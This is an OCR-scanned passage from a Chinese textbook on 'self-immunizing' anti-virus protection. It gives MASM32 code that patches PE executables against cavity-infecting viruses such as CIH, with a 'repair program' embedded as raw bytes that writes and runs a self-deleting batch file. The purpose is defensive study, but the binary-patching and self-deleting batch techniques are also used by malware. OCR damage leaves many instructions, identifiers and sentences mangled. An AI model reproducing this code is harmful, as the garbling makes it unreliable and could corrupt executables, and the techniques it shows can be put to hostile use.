Y 
退出 当前 程序 执行 被 保护 程序 | 一 和 >| 生成 批 处 理 文件 

图 3-21 被 保护 程序 图 3-22 修复 程序 
( 批 处 理 
ER J 
修复 程序 No 
RHE? 
Ue 
删除 修复 程序 
自我 删除 
图 3-23 批 处 理 程序 
3. 对 于 第 三 种 病毒 


对 于 第 三 种 病毒 的 办 法 是 ， 让 每 个 节 中 的 节 大 小 描述 参数 相等 ， 即 让 节 实际 大 小 字段 
VirtualSize 和 占用 磁盘 空间 字段 SizeOfRawData 相等 ， 同 时 在 空白 区 添 入 随机 数据 ， 以 其 
骗 病毒 以 为 无 空间 可 以 利用 。 这 也 是 CIH 为 什么 不 能 感染 所 有 exe 文件 的 原因 。 


其 算法 步骤 是 : 


(1) 得 到 节 个 数 。 由 DOS 头 结构 字段 e lfanew 定位 PE 头 结构 位 置 ， 读 取 PE k, TE 
其 包含 的 文件 头 中 得 到 节 个 数字 段 NumberOfSections。 

(2) 读 节 表 。 依 据 节 个 数 分 配 节 表 缓冲 区 ， 读 取 所 有 节 表 到 缓冲 区 。 

(3) 计算 节 空 白 区 文件 偏 移 和 大 小 。 遍 历 每 个 节 ， 空 白 区 的 文件 偏 移 等 于 该 节 文件 偏 
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移 (字段 PointerToRawData) 加 上 该 节 实 际 大 小 (字段 VirtualSize)。 空 白 区 大 小 为 该 节 实际 占 
用 磁盘 空间 (字段 SizeOfRawData) 减 去 该 节 实际 大 小 (字段 VirtualSize) 得 到 。 

(4) 生成 随机 数据 填充 空白 区 。 

(5) 修改 节 表 结构 。 让 缓冲 区 中 每 个 节 表 的 字段 VirtualSize 等 于 字段 SizeOfRawData, 
将 缓冲 区 数据 写 入 原 节 表 位 置 。 
3.4.2 自 免疫 防 病毒 实现 

主要 分 为 程序 框架 、 修 改 被 保护 程序 文件 、 设 置 修复 程序 、 设 置 批 处 理 文件 4 个 部 分 
讲述 。 

1. 程序 框架 

程序 应 该 能 选择 和 显示 被 修改 的 结果 ， 如 图 3-24 所 示 。 按 钮 “选择 文件 ”选择 被 加 工 
的 可 执行 文件 。 中 间 的 大 框 控件 用 来 显示 加 工 信 息 ， 下 面 的 第 一 个 可 编辑 框 用 于 设 定 预先 
设置 于 文件 中 的 CRC32 位 校 验 值 ， 最 下 面 的 可 编辑 框 用 于 显示 CRC32 位 校 验 值 在 被 加 工 
文件 中 的 偏 移 。 


自 免疫 软件 包 _2004 年 7 月 


এ 请 选择 文件 


图 3-24 自 免疫 工具 


生成 框架 的 源 程 序 如 下 : 


.386 
model flat, stdcall 
option casemap :none `: case sensitive 


:要 使 用 的 API 函数 所 在 的 头 文件 和 库 文件 ， 需 要 包含 
include \masm32\include\windows.inc 
include \masm32\include\user32.inc 
include \masm32\include\kernel32.inc 
include \masm32\include\gdi32.inc 
include \masm32\include\comdlg32.inc 
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include \masm32\include\masm32.inc 
includelib \masm32\lib\user32.lib 
includelib \masm32\lib\kernel32.lib 
includelib \masm32\lib\gdi32.lib 
includelib \masm32\lib\comdlg32.lib 
includelib \masm32\lib\masm32.lib 


; 宏 szText 定义 只 读 字符 串 
szText MACRO Name, Text VARARG 
LOCAL 10] 
jmp Ibl 
Name db Text.O 
Ibl: 
ENDM 


; 宏 m2m 实现 变量 交换 
m2m MACRO MI. M2 
push M2 
pp MI 
ENDM 
: 宏 retum 实现 返回 ， 且 返回 值 在 eax(Windows 的 函数 都 是 这 样 ) 
retum MACRO arg 
mov eax, arg 
ret 
ENDM 
ZE RGB 实现 颜色 值 定义 到 eax 
RGB macro red, green, blue 
xor eax, eax 
mov ah, blue 
shl eax, 8 
mov ah, green 
moval, red 
endm 


: 函数 原型 声明 


: 主 窗口 函数 
WinMain PROTO :DWORD.:DWORD.:DWORD.:DWORD 
: 主 窗口 事件 处 理 函 数 
WndProc PROTO :DWORD.:DWORD.:DWORD.:DWORD 
:建立 列表 框 函数 
ListBox PROTO :DWORD.:DWORD.:DWORD.:DWORD. 
:DWORD.:DWORD 
:列表 框 的 事件 处 理 函 数 
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ListBoxProc PROTO :DWORD.:DWORD.:DWORD.:DWORD 
:建立 按钮 函数 
PushButton PROTO :DWORD.:DWORD.:DWORD.:DWORD. 
:DWORD.:DWORD.:DWORD 
:建立 可 编辑 框 函数 
EditSI PROTO :DWORD.:DWORD.:DWORD.:DWORD. 
:DWORD.:DWORD.:DWORD 
:建立 静态 框 函数 
Static PROTO :DWORD.:DWORD.:DWORD.:DWORD. 
:DWORD.:DWORD.:DWORD 
:文件 选择 函数 ， 选 择 被 加 工 文件 
GetFileName PROTO :DWORD, :DWORD. :DWORD 
:文件 保存 函数 ， 保 存 加 工 后 的 文件 
SaveFileName PROTO :DWORD, :DWORD. :DWORD 
:文件 分 析 函 数 ， 分 析 是 否 可 以 被 加 工 
AnalyzeFile PROTO 
:计算 文件 中 不 包括 校 验 值 4 字 节 的 其 他 内 容 的 CRC32 校 验 值 
GetFileCrc32 PROTO :DWORD, :DWORD 
:代码 附加 。 代 码 将 免疫 代码 加 入 到 被 加 工 文件 
InsertCode PROTO :DWORD 
:插入 随机 数据 到 节 的 空白 区 
InsertRand PROTO 
;以 下 为 加 入 到 新 程序 中 函数 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
: 主 程序 数据 段 
.data 
szDisplayName db " 自 免疫 软件 包 _2004 年 7 月 ".0 
szClassName db "Template Class".0 
CommandLine dd0 


hWnd dd0 :当前 主 窗口 句柄 

hlnstance 0৫০ ;当前 应 用 程序 句柄 

hList ddo ;列表 框 句柄 

lpLstBox dd0 :列表 框 消息 处 理 函数 

hEditl dd0 :可 编辑 框 句 柄 ， 显 示 前 后 校 验 值 

hEdit2 dd0 :可 编辑 框 句柄 ， 显 示 校 验 值 在 文件 中 偏 移 
hButton1 dd0 :按钮 句柄 ， 选 择 文件 

ofn OPENFILENAME © :打开 文件 用 


szFileName db 260 dup(0) :文件 名 缓冲 区 

crc file offsetl 0 dd 0 : 校 验 值 在 被 加 工 文件 中 偏 移 
‘const :定义 常量 

szEmCreate db "创建 文件 错误 !.0dh.0ah.0 

szMySection db “免疫 '.0 

szSuccessdb “' 附 加 :%s'.0 

crc offset db ' 校 验 值 在 文件 中 偏 移 值 为 %xH'.0 
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:代码 段 
-code 
start: 
invoke GetModuleHandle, NULL 
mov hlnstance, eax 
invoke GetCommandLine 
mov CommandL ine, eax 
:调用 建立 主 窗口 函数 
invoke WinMain, hInstance, NULL. X 
CommandLine, SW SHOWDEFAULT 
invoke ExitProcess, eax :退出 进程 
:窗口 主 函数 


WinMain proc hInst :DWORD. 
hPrevInst :DWORD, 
CmdLine :DWORD, 
CmdShow | :DWORD 


; 定义 局 部 变量 


LOCAL we  :WNDCLASSEX 
LOCAL msg :MSG 

LOCAL Wwd :DWORD 
LOCAL Wht :DWORD 
LOCAL Wtx :DWORD 
LOCAL Wty :DWORD 


; 填充 WNDCLASSEX 结构 


mov wc.cbSize, Sizeof WNDCLASSEX 

mov we.style, CS HREDRAW or CS_VREDRAW :窗口 属性 
or CS_ BYTEALIGNWINDOW 
: 挂 接 窗口 消息 处 理 函数 

mov wc.pfnWndProc. offset WndProc 

mov wc.cbClsExtra, NULL 

mov wc.cbWndExtra, NULL 

mov eax, hlnst 

mov wc.hInstance, eax 

mov wc.hbrBackeround; COLOR BINFACEH2 :背景 颜色 

mov wc.lpszMenuName, NULL 

mov wclpszClassName, offset szClassName 

invoke LoadIcon.hmst 500 : 图 标 

mov  wc.hlcon, eax 

invoke LoadCursor NULL, IDC ARROW :设置 光标 形状 
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mov wc.hCursor, eax 
mov wc.hlconSm, 0 
invoke ”RegisterClassEx， ADDR wc :注册 窗口 


: 窗口 位 置 与 大 小 

mov Wwd, 500 :窗口 宽度 

mov Wht, 350 :窗口 高 度 

:invoke GetSystemMetrics, SM_CXSCREEN 

mov Wt300 :左上 角 x 

:invoke GetSystemMetricsSM CYSCREEN 

mov Wty,200 :左上 角 y 

:建立 窗口 

invoke CreateWindowEx.WS EX LEFT. 

ADDR szClassName, 
ADDR szDisplayName, 
WS OVERLAPPEDWINDOW, 
Wtx, Wty, Wwd, Wht, 
NULL.NULL, 
hInst. NULL 

mov hWnd, eax :窗口 句柄 

invoke ShowWindow, hWnd, SW_SHOWNORMAL :窗口 句柄 

invoke UpdateWindow, hWnd ;刷新 窗口 


; 运行 循环 程序 ， 直 到 消息 处 理 程序 中 发 出 PostQuitMessage 


StartLoop: 
:获取 消息 队列 中 消息 
invoke GetMessage, ADDR msg, NULL, 0, 0 
cmp eax, 0 
je ExitLoop :返回 0， 退 出 循环 
invoke TranslateMessage. ADDR msg 
invoke DispatchMessage, ADDR msg 
jmp StartLoop 
ExitLoop: 
mov eax, msg.wParam 
ret 
WinMain endp 
:窗口 消息 处 理 函 数 
WndProc proc hWin :DWORD. 
uMsg  :DWORD, 
wParam :DWORD., 
lParam : DWORD 
LOCAL hDC:DWORD 
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LOCAL hFont: DWORD 
LOCAL Ps:PAINTSTRUCT 
ifuMsg — WM DESTROY 
:退出 
invoke PostQuitMessage.NULL 
:一 般 在 WM. CREATE 消息 下 建立 控件 
elseif uMsg = WM CREATE 
MOVeax, hWin 
MOV hWnd, eax 
:建立 按钮 
szText myButtl, "请 选择 文件 ' 
invoke PushButton, ADDR myButt1. hWin. 390, 25. 100, 25, 501 
:返回 值 eax 为 控件 句柄 
mov hButtonl, eax 
:建立 列表 框 ， 位 置 大 小 (5.27)(370.230). 父 窗口 为 hWin，ID 为 500 
invoke ListBox, 5, 27, 370, 230, hWin. 500 
mov hList eax :窗口 句柄 
:设置 列表 框 hList 的 消息 处 理 函 数 为 ListBoxProc 
invoke SetWindowLong, hList, GWL_WNDPROC， ListBoxProc 
mov lpLstBox, eax 
:建立 可 编辑 框 控件 hEditl 
invoke EditSl NULL. 140. 265, 140. 20, hWin. 701 
mov hEditl, eax :获取 控件 句柄 
:建立 可 编辑 框 控件 hEdit2 
invoke EditSl, NULL. 220. 290, 70, 20, hWin. 703 
mov hEdit2, eax 
:建立 Static 控件 
szText noti 1, "操作 提示 信息 :" 
invoke Static, ADDR noti 1,hWin. 5, 5, 95, 20, 801 
szText noti 2, "显示 前 后 校 验 值 :" 
invoke Static; ADDR noti 2, hWin, 5. 265. 130. 20. 802 
szText noti 3, " 校 验 值 在 文件 中 随机 偏 移 :" 
invoke Static; ADDR noti 3, hWin, 5. 290. 190. 20. 802 
:处 理 窗口 绘制 消息 ， 在 此 设置 文字 字体 字号 
.elseifuMsg = WM PAINT 
invoke BeginPaint.hWin.ADDR Ps 
mov hDC, eax 
szText FontName, "楷体 " 
invoke CreateFont, 24. 10. 0. 0. 400, 0. 0, 0, OEM CHARSET,\ 
OUT DEFAULT PRECIS, CLIP DEFAULT PRECIS. 
DEFAULT QUALITY, DEFAULT PITCH or FF SCRIPT. 
ADDR FontName 
invoke 96160100101, hDC, eax 
mov hFont, eax 
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:定义 颜色 值 ， 返 回 颜色 值 到 eax 
RGB 200. 200. 50 
:设置 文本 颜色 为 eax 
invoke SetTextColor, hDC, eax 
RGB 0,0,255 
:设置 文本 背景 颜色 为 eax 
invoke SetBkColor, hDC. eax 
szText TestString, "程序 设计 : 赵 树 升 " 
:显示 文本 
invoke TextOut, hDC. 320. 288. ADDR TestString.SIZEOF TestString-1 
invoke SelectObject.hDC, hFont 
invoke EndPaint.hWin.ADDR Ps 
:处 理 按钮 控件 消息 
elseif uMsg = WM COMMAND 
:ID=501 的 按钮 事件 
Af wParam = 501 
szText fName sel "**" :文件 过 滤 
jmp Qf  ”: 跳 转 到 下 个 标号 
szFilter — db "exe 文 件 ", 0, "*.exe", 0 
;竟然 要 两 个 0， 否 则 有 乱 字符 。 经 验 也 
db "dll 文件 ".0,"*.dll".0.0 :设置 打开 的 文件 过 滤 条 件 
@@ :下 个 标号 
:选择 可 执行 文件 ， 文 件 名 在 szFileName 
invoke GetFileName, hWin, ADDR fName sel, ADDR szFilter_ 
:其 他 事件 处 理 
.endif 
„endif 
:系统 缺 省 的 其 他 消息 处 理 
invoke DefWindowProc, hWin, uMsg, wParam, lParam 
ret 
WndProc endp 


:建立 列表 框 函数 定义 
ListBox proc a: DWORD, b: DWORD, wd: DWORD, ht: DWORD, 
hParen:DWORD.ID:DWORD 
szText lstBox, "LISTBOX" :控件 类 型 
invoke CreateWindowEx, WS EX CLIENTEDGE. ADDR lstBox. 0. 
WS VSCROLL or WS VISIBLE or V 
WS BORDER or WS CHILD or \ 
LBS HASSTRINGS or LBS NOINTEGRALHEIGHT or \ 
LBS DISABLENOSCROLL. 


a. b. wd, ht hParent ID. hInstance, NULL 
ret 


ListBox endp 
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; 列表 框 事 件 处 理 函 数 ， 由 SetWindwowLong 使 用 
ListBoxProc proc 11001] :DWORD. 
uMsg :DWORD. 
wParam : DWORD, 
lParam : DWORD 
:调用 系统 缺 省 的 ListBox 消息 处 理 函 数 
invoke CallWindowProc. IpLstBox. hCtl.uMsg, wParam, lParam 
ret 
ListBoxProc endp 
:建立 按钮 函数 定义 
PushButton proc lpText DWORD, 
hParent: DWORD, 
a: DWORD, 
b: DWORD. 
wd: DWORD, 
ht: DWORD, 
ID: DWORD 
szText btnClass, "BUTTON" 
invoke CreateWindowEx, 0, ADDR — btnClass, IpText. 
WS CHILD or WS VISIBLE, 
a, b. wd, ht, hParent, ID, 
hInstance, NULL 
ret 
PushButton endp 
IHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHE 
:建立 可 编辑 框 函数 定义 
Editsl proc szMsg: DWORD, 
a: DWORD, 
b: DWORD, 
wd: DWORD, 
ht: DWORD, 
hParent: DWORD, 
ID: DWORD 


jmp @f 

slEdit db "EDIT", 0 

@@: 
invoke CreateWindowEx, WS EX CLIENTEDGE, ADDR 

slEdit szMsg. WS VISIBLE or WS CHILDWINDOW or \ 
ES AUTOHSCROLL or ES NOHIDESEL or ES READONLY, 
a. b. wd, ht, hParent ID, hInstance, NULL 
ret 
EditSl endp 
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:建立 静态 框 函数 定义 
Static proc lpText: DWORD, 
hParent: DWORD, 
a: DWORD, 
b: DWORD, 
wd: DWORD, 
ht: DWORD, 
ID: DWORD 
; 应 用 举例 invoke Static, ADDR szText.hWnd.20.20.100.25.500 
szText statClass, "STATIC" 
invoke CreateWindowEx, WS_EX_STATICEDGE, 
ADDR statClass, IpText, 
WS_CHILD or WS_VISIBLE or SS_LEFT, 
a, b. wd. ht. hParent, ID, hInstance, NULL 
ret 
Static endp 
:修复 程序 的 二 进 制 代码 数据 ， 得 到 方法 在 后 面 会 讲 到 
MENDpro CODE equ this byte 
mend data db 77.90.144.0.3.0.0.0.4.0.0.0.255.255.0.0 
db 184.0.0.0.0.0.0.0.64.0.0.0.0.0.0.0 
db 0,0,0,0.0,0,0.0.0.0,0.0.0.0,0.0 
db 0,0,0.0.0,0,0,0.0,0,0.0.192.0.0.0 
db 14,31,186.14.0,180,9,205,33,184,1,76.205,33,84.104 
db 105,115,32.112.114.111.103,114.97.109,32.99,97.110.110,111 
db 116.32.98.101.32.114.117.110.32.105.110.32.68.79.83.32 
db 109.111,100,101,46.13,13.10,36.0.0.0.0.0.0.0 
db 236.30.29,28.168.127.115.79.168,127.115.79.168.127,115.79 
db 38,96,96,79.191.127.115,79.84.95.97,79.169.127.115.79 
db 82,105.99.104,168.127,115.79.0,0.0.0.0,0.0.0 
db 0.0.0.0.0.0,0.0.0.0.0.0.0.0.0.0 
db 80,69.0.0.76.1,3.0,117.68,199.66.0.0.0.0 
db 0,0,0.0.224.0.15.1.11,1,5.12.0.4.0.0 
db 0.4.0.0.0.0.0.0.0.16.0.0.0.16.0.0 
db 0.32.0.0.0.0.64.0.0.16.0.0.0.2.0.0 
db 4.0.0.0.0.0,0.0.4.0,0.0.0.0.0.0 
db 0.64.0.0.0.4.0.0.0.0.0.0.2.0.0.0 
db 0.0.16.0.0.16.0.0.0.0.16.0.0.16.0.0 
db 0.0.0.0.16.0.0.0.0.0.0.0.0.0.0.0 
db 68.32.0.0,60,0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0,0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0,0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0,0.0.0.0.0.0.0.0.0.0.0 
db 0,0.0.0.0,0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0,0.0.0.0.32.0.0.68.0.0.0 
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db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 

db 0.0.0.0.0.0.0.0.46.116.101.120.116.0.0.0 

db 238.2.0.0.0.16.0.0.0.4.0.0.0.4.0.0 

db 0.0.0.0.0.0.0.0.0.0.0.0.32.0.0.96 

db 46.114.100.97.116.97.0.0.202.1.0.0.0.32.0.0 
db 0.2.0.0.0.8.0.0.0.0.0.0.0.0.0.0 

db 0.0.0.0.64.0.0.64.46.100.97.116.97.0.0.0 

db 4.0.0.0.0.48.0.0.0.2.0.0.0.10.0.0 

db 0.0.0.0.0.0.0.0.0.0.0.0.64.0.0.192 


db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


db 232.173.2.0.0.163.0.48.64.0.232.11.0.0.0.232 

db 3.1.0.0.80.232.146.2.0.0.85.139.236.129.196.248 

db 253.255.255.83.81.82.86.87.235.4.99.58.92.0.104.0 
db 1.0.0.141.133.0.254.255.255.80.232.139.2.0.0.104 
db 0.1.0.0.141.133.0.255.255.255.80.232.122.2.0.0 

db 255.53.0.48.64.0.232.135.2.0.0.137.133.248.253.255 
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db 255.255.181.248.253.255.255.255.53.0.48.64.0.141.133.0 
db 255.255.255.80.232.75.2.0.0.141.157.0.255.255.255.67 

db 235.1.67.128.59.32.116.5.128.59.0.117.245.67.137.157 

db 252.253.255.255.104.42.16.64.0.141.133.0.254.255.255.80 
db 232,55.2.0,0.255.181.252.253.255.255.232.502.0.0 

db 139.216.131.235.3,3.157.252.253.255.255.128,59.92.116.3 
db 75.235.248.67.83.141.133.0.254.255.255.80.232.5.2.0 

db 0,51.219.235.13.255.181.252.253.255.255.232.198.1.0.0 
db 139,216,1 1,219,116,239,106,0,255,181,252,253,255,255,141,133 
db 0.254.255.255.80.232.160.1.0.0.106.5.106.0.106.0 

db 141.133.0.254.255.255.80.106.0.106.0.232.216.1.0.0 

db 95.94.90.89.91.201.195.85.139.236.129.196.244.250.255.255 
db 83.81.82.86.87.104.0.1.0.0.141.133.0.255.255.255 

db 80.232.148.1.0.0.104.0.4.0.0.141.133.0.251.255 

db 255.80.232.131.1.0.0.235.74.58.82.101.112.101.97.116 

db 13.10.100.101.108.32.0.13.10.105.102.32.101.120.105.115 
db 116.32.34.0.34.32.103.111.116.111.32.82.101.112.101.97 
db 116.13.10.100.101.108.32.99.58.92.97.110.121.101.120.101 
db 46.98.97.116.0.99.58.92.97.110.121.101.120.101.46.98 

db 97.116.0.106.0.232.36.1.0.0.137.133.244.250.255.255 

db 104.0.1.0.0.141.133.0.255.255.255.80.255.181.244.250 

db 255.255.232.1.1.0.0.104.73.17.64.0.141.133.0.251 

db 255.255,80,232.20.1,0.0,141,133,0,255,255.255.80,141 

db 133.0.251,255,255.80.232.251,0,0.0.104.87.17,64.0 

db 141,133,0.251,255,255,80.232,234,0.0,0.141,133.0.255 

db 255,255,80.141,133.0.251.255,255,80.232.215.0.0.0.104 
db 100.17.64.0.141,133.0.251,255,255.80.232.198,0.0.0 

db 106.0.106,0.106.2.106.0,106,1,104,0,0.0,64.104 

db 133.17.64.0.232.119,0.0.0.137,133.244,250,255.255.131 
db 248.255.117,7.95.94.90.89.91.201.195.141.133.0.251.255 
db 255,80.232.,155.0.0.0.137,133,252,250,255,255,106.0.141 
db 133,248,250.255.255,80,255.181,252.250.255.255.141.133.0.251 
db 255,255,80.255.181.244,250,255.255.232.98.0.0.0.255.181 
db 244.250,255.255.232.27.0.0.0.106,0.106,0.106.0.104 

db 133.17.64.0.106,0.106.0.232.91.0.0,0.95.94.90 

db 89.91.201,195,255.37.8.32.64.0.255,37.12.32.64.0 

db 255,37.16,32.64.0.255.37.20.32.64.0.255.37.24.32 

db 64.0.255.37.28.32.64.0.255.37.32.32.64.0.255.37 

db 0.32.64.0.255.37.4.32.64.0.255.37.40.32.64.0 

db 255.37,44,32.64.0.255.37.48.32.64.0.255.37.36.32 

db 64.0.255.37,52.32.64.0.255,37.60.32,64.0.0.0 

db 0.0.0.0,0,0.0.0.0.0.0.0.0.0.0.0 

db 0.0.0.0,0,0.0.0.0.0.0.0.0.0.0.0 

db 0.0.0.0,0,0.0.0.0.0.0.0.0.0.0.0 
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db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 

db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 

db 60.33.0.0.80.33.0.0.208.32.0.0.222.32.0.0 

db 234.32.0.0.248.32.0.0.6.33.0.0.20.33.0.0 

db 38.33.0.0.136.33.0.0.96.33.0.0.112.33.0.0 

db 124.33.0.0.148.33.0.0.0.0.0.0.174.33.0.0 

db 0.0.0.0.128.32.0.0.0.0.0.0.0.0.0.0 

db 160.33.0.0.0.32.0.0.188.32.0.0.0.0.0.0 

db 0.0.0.0.190.33.0.0.60.32.0.0.0.0.0.0 

db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 

db 60.33.0.0.80.33.0.0.208.32.0.0.222.32.0.0 

db 234.32.0.0.248.32.0.0.6.33.0.0.20.33.0.0 

db 38.33.0.0.136.33.0.0.96.33.0.0.112.33.0.0 

db 124.33.0.0.148.33.0.0.0.0.0.0.174.33.0.0 

db 0.0.0.0.117.115.101.114.51.50.46.100.108.108.0.0 

db 26.0.67.108.111.115.101.72.97.110.100.108.101.0.36.0 

db 67.111.112.121.70.105.108.101.65.0.48.0.67.114.101.97 
db 116.101.70.105.108.101.65.0.83.0.68.101.108.101.116.101 
db 70.105.108.101.65.0.128.0.69.120.105.116.80.114.111.99 
db 101.115.115.0.200.0.71.101.116.67.111.109.109.97.110.100 
db 76.105.110.101.65.0.7.1.71.101.116.77.111.100.117.108 
db 101.70.105.108.101.78.97.109.101.65.0.0.9.1.71.101 

db 116.77.111.100.117.108.101.72.97.110.100.108.101.65.0.0 
db 9.2.82.116.108.77.111.118.101.77.101.109.111.114.121.0 
db 11.2.82.116.108.90.101.114.111.77.101.109.111.114.121.0 
db 158.2.87.114.105.116.101.70.105.108.101.0.181.2.108.115 
db 116.114.99.97.116.65.0.0.187.2.108.115.116.114.99.112 
db 121.65.0.0.191.2.108.115.116.114.108.101.110.65.0.0 

db 107.101.114.110.101.108.51.50.46.100.108.108.0.0.103.0 
db 83.104.101.108.108.69.120.101.99.117.116.101.65.0.115.104 
db 101.108.108.51.50.46.100.108.108.0.0.0.0.0.0.0 

db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


Gk. E a 
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db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 


db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
db 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 
MENDpro CODE END equ this byte :修复 程序 代码 结束 
;免疫 代码 的 开始 位 置 
APPEND CODEequ this byte 
- 后 面 会 介绍 


end start 


2. 修改 被 保护 程序 文件 


(1) 选择 可 执行 文件 
在 消息 处 理 中 调用 函数 GetFileName. 2 hParen 为 父 窗口 句柄 ， 参 数 jpTitle 为 文件 
选择 窗口 标题 ， 参 数 lpFilter 为 要 选中 的 文件 类 型 。 函 数 内 调用 的 函数 GetOpenFileName 
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为 文件 选择 对 话 框 API。 弹 出 的 对 话 框 如 图 3-25 所 示 。 


GetFileName proc hParent: DWORD, IpTitle: DWORD, lpFilter:DWORD 
mov ofn.StructSize, sizeof OPENFILENAME 
m2m ofn.hWndOwner, hParent 
m2m  ofn.hInstance, hInstance 
m2m ofn.pstrFilter, IpFilter 
m2m of 名 lpstrFile. offset szFileName 
mov ofn.nMaxFile, sizeof szFileName 
m2m ofn.pstrTitle, IpTitle 

mov ofn.Flags, OFN EXPLORER or 

OFN FILEMUSTEXIST or OFN LONGNAMES 
invoke GetOpenFileName, ADDR ofn 

df eax— TRUE :打开 文件 成 功 

:文件 名 在 ofn 的 IpstrFile 中 
invoke AnalyzeFile :分 析 文 件 格式 
endif 

ret 

GetFileName endp 


SHEED: [Ssss — — লাল 


Bue Amo] 
exe 文件 আআ mis | 
厂 以 只 读 方式 打开 @) 


图 3-25 文件 选择 对 话 框 
Q) 分 析 可 执行 文件 


AnalyzeFile proc 
LOCAL hFile: DWORD ”: 文 件 句柄 
LOCAL hLen: DWORD, hLen 2:DWORD :文件 长 度 
LOCAL xtem: DWORD ”: 临 时 变量 
LOCAL dos header: IMAGE DOS HEADER :DOS 头 结构 
LOCAL nt header: IMAGE NT HEADERS :PE 头 结构 
LOCAL psec: DWORD : 节 表 结构 缓冲 区 指针 
LOCAL flagsl: DWORD :修改 成 功 否 标志 
LOCAL info[256]: BYTE :信息 显示 

:清空 列表 框 信息 

invoke SendMessage. hList. LB RESETCONTENT. 0. 0 
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:打开 文件 ， 文 件 名 在 数据 段 ， 为 szFileName 
invoke CreateFile. addr szFileName. GENERIC READ or 


GENERIC WRITE, 0.NULL, OPEN EXISTING.0.NULL 
mov hFile, eax 
invoke RtlZeroMemory. ADDR info, 256 
if hFile— INVALID HANDLE VALUE :失败 ， 退 出 
szText szErrOpen, "不 能 读 写 文件 : " 
invoke Istrcpy. ADDR info. addr szErrOpen 
invoke lstrcat， ADDR info, addr szFileName 
ret 
.else 
szText szOpenOk, "成 功 打开 文件 :" 
invoke Istrcpy. ADDR info, addr szOpenOk 
invoke lstrcat, ADDR info, addr szFileName 
„endif 
invoke SendMessage, hList, LB_ADDSTRING, 0, addr info :提示 信息 
invoke GetFileSize, hFile, NULL 0014 


mov hLen, eax 
: 读 DOS 头 
invoke ReadFile,hFile, ADDR dos header, sizeof 
IMAGE DOS HEADER, ADDRhLen 2, NULL 
